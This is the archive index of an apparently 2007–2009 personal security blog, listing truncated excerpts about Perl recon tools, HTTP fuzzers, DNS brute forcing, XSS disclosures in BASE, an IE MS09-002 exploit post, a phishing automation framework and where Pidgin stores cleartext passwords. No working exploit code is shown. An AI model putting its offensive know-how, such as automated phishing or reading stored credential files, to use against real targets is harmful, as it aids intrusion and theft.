spl0it.org

Archives

Show All

2009
- June
  - Moving my blog to http://blog.spl0it.org
    06/28/09
    I have decided to switch from simplephpblog to blogger. The blog will continue to be focused on Security, Perl, Open Source tools and a combination of all of the above. I will include information about presentations and papers, I'm working on. I hope you find it useful!
    
    The new blog
  - Cowpatty 4.5 in Backtrack4
    06/07/09
    Josh Wright updated coWPAtty to version 4.5. This version includes some awesome new improvements:
    
    * Fewer restrictions on collecting the data needed to mount an attack. The default behavior requires all 4 frames of the 4-way handshake to mount an attack. If you specify "-2"
- May
  - BackTrack 4 Pre-Final
    05/30/09
    If you want to get your hands on a copy of BackTrack 4 Pre-final just donate to Hackers for Charity and you can get a copy.
    
    Here is some more information:
    
    http://www.offensive-security.com/blog/
    
    Regards,
    Jabra
  - BASE - 3 More Persistent Cross-Site Scripting Vulnerabilities
    05/30/09
    
    Recently, the BASE team released version 1.4.3 nicknamed "gabi". During a long night working on Backtrack 4, I started playing around with BASE 1.4.3. Within minutes I found 3 Persistent Cross-Site Scripting(XSS) vulnerabilities. For those who don't know, Cross-Site Script
  - BASE - Persistent and Reflective XSS
    05/22/09
    ** Update 05/31 **
    
    Here are more details:
    
    http://spl0it.org/files/BASE-XSS/Persistent-notes.txt
    http://spl0it.org/files/BASE-XSS/Persis
    http://spl0it.org/files/BASE-CSRF/notes.txt
    http://spl0it.org/files/BASE-XSS/Reflective-notes.txt
    
    Basic Analy
  - Backtrack4 + Snort
    05/13/09
- April
  - Collaboration with Gobby!
    04/26/09
    Peer-programming is one way that good software is developed. To do peer-programming, requires at least two people to focus on a problem and build the solution together. This can be done with a single computer and two chairs or vim + screen. Recently, I found a new program that provides the functiona
- March
  - Blackhat 2008 and DojoSec Videos online
    03/30/09
    I just noticed the Blackhat 2008 and DojoSec videos are online.
    
    https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html
    
    http://www.dojosec.com/?page_id=14
    
    Regards,
    Jabra
  - Cisco starts Patch Wednesday
    03/25/09
    "Starting on March 26, 2008, Cisco will release bundles of IOS Security Advisories on the fourth Wednesday of the month in March and September of each calendar year."
    
    http://www.cisco.com/en/US/products/pro
    
    Happy patching!
    
    Regards,
    Jabra
  - InfoSec World 2009 - Total Browser Pwnag3 Slides
    03/14/09
    
    I recorded the voiceovers for all of the demos today. I will post them sometime soon.
    
    Regards,
    Jabra
  - Infosec World FTW
    03/13/09
    This week I was down in Orlando to give a talk at Infosec World with Rafal Los from HP. Prior to the talk we went out the first night for karaoke. Here is what occurred before I arrived:
    
    Mike Murray doing "Ice Ice Baby" by Vanilla Ice.
    
    Wow. That is all I h
- February
  - Song that encompasses my thoughts on Perl
    02/22/09
    For those of you that know me, chatted with me in IRC, met me at a con, I'm sure you will agree with me on this:
    
    http://www.youtube.com/watch?v=Fcd3XuQwDQQ
    
    Perl FTW!
    
    Regards,
    Jabra
  - BeEF, now with MS09-002 goodness!!
    02/21/09
    http://www.bindshell.net/entry/50
    
    Enough said. Happy 0wnage!
    
    Regards,
    Jabra
  - MS09-002 Exploit
    02/19/09
    If you were at ShmooCon, you may have heard the following phrase a few times, "Lets pop a box".
    
    Okay, sure why not. So there was a recent IE vulnerability released with an exploit on milworm.
    
    First, Metasploit with Meterpreter on the attack box 192.168.1.50:
  - Hak5 Interview at ShmooCon 2009
    02/14/09
    http://www.hak5.org/episodes/episode-426
    
    http://www.youtube.com/watch?v=srI8QI7DKiU
    
    The interview with me starts at the 8th minute. I talk about the wireless visualization software I released at ShmooCon called GISKismet.
    
    Thanks again to Mister_X for helping out wit
  - ShmooCon 2009 Slides - Next Generation Wireless Recon, Visualizing The Airwaves
    02/09/09
    Here are the slides from our talk at ShmooCon 2009:
    
    Abraham-Smith-ShmooCon2009
    
    It was great to meet everyone. Please send me comments and suggestions or post tickets at http://www.giskismet.org
    
    I'm looking forward to getting more feedback on ways to improve the
  - Get to DC for ShmooCon 2009!
    02/04/09
    Hopefully, you are planning on attending ShmooCon 2009 in DC this upcoming weekend. TheX1le and I will be giving a wireless presentation on Saturday at noon. Our talk Next Generation Wireless Recon, Visualizing the Airwaves focuses on software that we have built to represent wireless reconnaissance
- January
  - Microsoft Releases Internet Explorer 8 RC1
    01/26/09
    IE 8 RC1 has been released recently. This is the first browser to address Clickjacking.
    
    http://www.microsoft.com/ie8
    
    Only time will tell if they did it correctly.
    
    Regards,
    Jabra
  - When German Looks like English
    01/23/09
    These just keep coming my way...
    
    http://translate.google.com/translate?p
    
    http://cnn.com looks like german right?? Nope. Well, redirect the user anyway! The annoying thing is that I'm not looking. Oye.
    
    Regards,
    Jabra
2008
- December
  - OWASP - AJAX Testing Survey
    12/28/08
    Today, I was working on reviewing all of the AJAX tools listed on the OWASP site. I would like to get input from the rest of the community to determine what are the best AJAX tools and why. If you're testing web applications with AJAX, please take a moment to review this survey:
    
    Clic
  - American Express bitten by XSS bugs (again)
    12/20/08
    http://www.theregister.co.uk/2008/12/20
  - A little Perl makes an 0day a good day
    12/16/08
    There was a recent 0day for IE 7, you may have heard a thing or two about it lately in the press. M$ is releasing a out of band patch tomorrow, http://isc.sans.org/diary.html?storyid=5497.
    
    meh.
    
    For those of you who wanted a bit easier route with the exploit, here is a few hel
  - Burpsuite 1.2 released!
    12/15/08
    My favorite web application testing framework has just been updated.
    
    http://seclists.org/webappsec/2008/q4/0041.html
    
    Awesome job PortSwigger! I look forward to many future releases.
    
    Regards,
    Jabra
  - Pidgin fail
    12/07/08
    Recently, a Red-Hat friend reminded me of an issue with pidgin in that when you save your password, it is saved in clear-text.
    
    Linux/Unix:
    
    ~/.purple/accounts.xml
    
    Windows XP:
    
    C:\Documents and Settings\%USERNAME%\Application Data\.purple\accounts.xml
    <
- October
  - Social Engineering Framework for Attacking Clients
    10/25/08
    Phishing attacks are easily performed against a single target. What if you want to automate and easily setup a client based attack against a list of targets??
    
    As always, my solution was Perl.
    
    I setup a custom YAML configuration file to make things a bit easier for daily u
  - Twitter'ing from the command-line
    10/14/08
    I'm not really into Twitter, but I decide to see how hard it would be to write a command-line client. Net::Twitter made it easy at 13 lines.
    
    http://spl0it.org/files/twitter.pl
    
    Regards,
    Jabra
  - The impact of Redirects
    10/13/08
    I would like to clarify the impact of URL redirects in this posting. First put yourself in the shoes of an attacker with a specific organization as the target. So where to start? Well, first we need to decide if we are going to attack IPs or users. Since it is generally known that the People are al
  - Redirects in abundance on Image search pages
    10/12/08
    I have discussed the impact of URL redirects in a previous posting, and I'm really shocked of how easy it was to find numerous instances of redirects in common search engines.
    
    I noticed the issue when a friend of mine posted a link on IRC of an image that he found using the image sea
  - User Agent Lookup
    10/04/08
    Need to lookup a User Agent and get a description? There has been some discussion about User Agent DBs on the web app sec mailing list recently, so I decided to write up a quick Perl script to utilize an XML User Agent DB.
    
    $ wget http://techpatterns.com/downloads/firef
    $ perl ua_look
- September
  - An awesome game => more Perl!
    09/24/08
    After getting home from an awesome game, I was in the mood to write some more Perl! I found a few more things during the day that I wondered how I was able to go without writing them already. The first is intersection and the second is union. They do exactly what you think they do and keep things ve
  - Perl Script to Locate any WiFi Router by Its MAC Address
    09/20/08
    So I noticed there is a free services at SkyHook Wireless to get the physical location of wireless router from its MAC address (BSSID)s Therefore, I decided to write up a Perl script since I saw that no one had done it yet.
    
    $ ./bssid-location.pl AABBCCDDEEFF
    Longitude: 12.4225458
  - GIS + Kismet = Pretty Cool Result!
    09/16/08
    These are three images using some software that I'm finishing up. For now, it lacks in documentation, but I guess a picture is worth a 1000 words!
    
    The more important image is the second, due to the fact it demonstrates what makes the first image. The data is based on extracting info
  - TJX Lead Hacker could get life in prison
    09/15/08
    http://arstechnica.com/news.ars/post/20
  - Reminder to use at!
    09/15/08
    At the end of the day I was preparing my things to go home, but I needed to schedule a few scans to execute over night. In the past I have used cron, but it occurred to me that cron isn't the best tool for setting up a single event that does not reoccur. The reason is it isn't as quick as
- June
  - Nmap Visual HIstory
    06/30/08
    I had sometime today to make a video using code_swarm a visualization tool. Basically, it uses the log from a project's version control repository to create an awesome video. The video shows the history of the nmap project.
    
    http://www.vimeo.com/1255202
    
    Re
- April
  - Creditcard Skimmer
    04/05/08
    My friend Ventz sent me a recent security announcement by RedBox. RedBox, is a company that allows you to rent movies in the same manner as a vending machine. Recently, RedBox found that at 7,400 RedBox locations illegal devices were added to the machines. These devices can be used to read or store
- February
  - Awesome Freeze At Grand Central
    02/01/08
    Okay, this is not really security related but I figured I would post it anyways.
    http://www.improveverywhere.com/2008/01
- January
  - XSS and Redirects
    01/27/08
    Yesterday, I was discussing with Jcran the risk associated with Cross Site Scripting and Redirects. First let me say, I know that URL redirects are an example of XSS. The type of Cross-Site Scripting vulnerability we were discussing is the reflective XSS. To clarify, URL redirects I mean taking a pa
  - Nikto now has XML support
    01/12/08
    So this November Nikto 2.0 was released. Having used Nikto 1.0 in the past, I decided to give version 2.0 a try and I was very impressed. I was so impressed that I decided that I would contribute to the project.
    
    In mid December, I had sometime to take another look at Nikto 2.0 and dive i
  - Email Lists (The Smart Way)
    01/03/08
    So many people use either Google or tools like goog-mail.py to generate email lists when performing a penetration test. However, goog-mail to be frank, sucks. So I have thought about a smarter way to gather email lists. It occurred to me that if you knew the scheme which a company uses to generate t
2007
- December
  - Extension Brute Forcing
    12/24/07
    So I have written a normal DNS BruteForcing tool a few times before. However, I have yet to write an extension Brute Force tool so I wrote one.
    
    http://spl0it.org/files/ext_brutedns.pl
    
    $ perl ext_brutedns.pl -d google.com
    google.com 64.233.167.99
    google.net
  - Net-Whois-ARIN - Bug + Patch
    12/24/07
    I was working on a WhoisLookup module for Fierce tonight. I got it working but there was a minor issue with returning elements that were not defined. If one of the elements of the query was not defined, it croaked with an undefined messaged in AUTOLOAD.
    
    Therefore, I fixed this by replaci
  - Writing a PingScan Module
    12/23/07
    I was working on a PingScan module for Fierce 2.0 tonight. I have used Nmap::Parser in the past, which made it easier.
    
    package PingScan;
    {
    use Object::InsideOut;
    use Nmap::Parser;
    
    # execute: Iprange -> Output(Array)
    # find all the IPs that
  - Starting a modular version of Fierce
    12/22/07
    I sat down tonight and built a solid foundation for the next version of Fierce. I'm not to go post the code for the first time in a long time, but I will say that things are *MOVING* along very nicely.
    
    Here is a snippet of the code:
    my $bf = BruteForceDNS->new(
    '
  - More Work on Fierce
    12/20/07
    So I sat down tonight and added some more functionality to Fierce. I added the ability for it to be able to determine all the IPs for a CNAME by doing a reverse lookup. When Rsnake and I went to confirm that things were working, there were some funky issues with the results.
    
    Here is an s
  - Fierce Zone Transfer Continue Patch
    12/20/07
    So I have been looking at ways to improve Fierce for a few weeks. I spoke with Rsnake and he said the one thing that Fierce does which could be improved, is once it performs a Zone Transfer it quits rather then continue onto a Brute Force DNS attack. Therefore, I decided to talk with a few guys at w
  - HTTP GET Fuzzer
    12/20/07
    This is the same script that I wrote yesterday, the only difference is that it uses a GET request instead of a POST.
    
    ex: $ ./get_fuzzer.pl --url http://www.DOMAIN.com/get \
    --fields user,passwd --values USER,PASS
    
    ex: $ ./get_fuzzer.pl --url http://www.DOMAIN
  - HTTP Post Fuzzer
    12/18/07
    Well, I continue to enjoy keeping the code coming. This time it was a HTTP Fuzzer. This script takes a URL to post to, as well as the fields to use. It can test a single value for each field or it can test them using lists.
    
    Ex: $ ./post_fuzzer.pl --url http://www.DOMAIN.com/post \
  - Transfer this
    12/18/07
    Albert and I were talking about how awesome a Zone transfer is. I figured I would write a script for him and demonstrate how awesome Perl is as well.
    
    http://spl0it.org/files/zone_transfer.pl
    
    Enjoy!
  - Searching Webpages with Perl
    12/16/07
    Need a quick way to search a bunch of webpages? Well, I wrote a script to do it. Enjoy!
    
    http://spl0it.org/files/http_grep.pl
    
    Basic Usage:
    % ./http_grep.pl -u http://spl0it.org -s security
    found security on
    http://spl0it.org
    Example of reading the list of we
  - Wipe a disk/device
    12/15/07
    This weekend I was helping my mother prepare a few laptops to be shipped back to the company which we bought them from. However, before we boxed them up, I suggested that we remove all the data from the machines since she was using them for doing some of her work.
    
    First, I booted into Ba
  - Backtrack3 Beta - Perfect place to try out all the new/updated tools we got for the holidays!!!!!!!
    12/14/07
    Finally, the Backtrack 3 Beta is Out!
    
    Download the ISO at:
    http://www.offensive-security.com/bt3b1
    md5sum : 04ed8742fc8facd1ecc8c9f6f567c116
    shasum : 70c33e0aa75a978b8a87a207bf488ecec8d10a87
    The USB/DVD can be downloaded at:
    http://www.offensive-security.com/bt3b1
  - Rip Out Those Links
    12/10/07
    Over the past weeks, a few people, myself included, have needed a method to rip links out of a webpage. Therefore, I took a look on CPAN to determine if there was a module which could provide this functionality. I found HTML::SimpleLinkExtor by brian d foy. This module provides a method to extract l
  - Data::Validate::IP - Patch done
    12/06/07
    So I took another look at the code from last night because I felt that I should try to determine how much work it will take this weekend to fix Data::Validate::IP. As it turns out, I made, tested and submitted the patch in less then 5 minutes. I think that is my new record!!
    
    Currently, Da
  - Validating IPs
    12/04/07
    One thing that I have had to write in the past has been a method to validate IP addresses. Recently, I found Data::Validate::IP, which is a Perl module which provides the ability to validate internal, external and loopback IP addresses.
    
    Therefore, I decided to write up a script to extract
  - Wow - I needed to reset my password already
    12/02/07
    So after only 12 days of having blog I forgot my password. Luckily, I can usually code my way out of any mess I get into related to software. I'm not a hardware guy. If it breaks, I usually just replace it. Anyways, I checked the SPHPBLOG site and the forum said you needed to re-run the install
- November
  - Fresh new Blog
    11/20/07
    So I decided I give this blogging thing another try. My first attempt wasn't much. I have decided to give it another try. I plan to make at least one solid post each week rather than worrying about posting everyday. I will focus on issues related to computer security. I'm going to discuss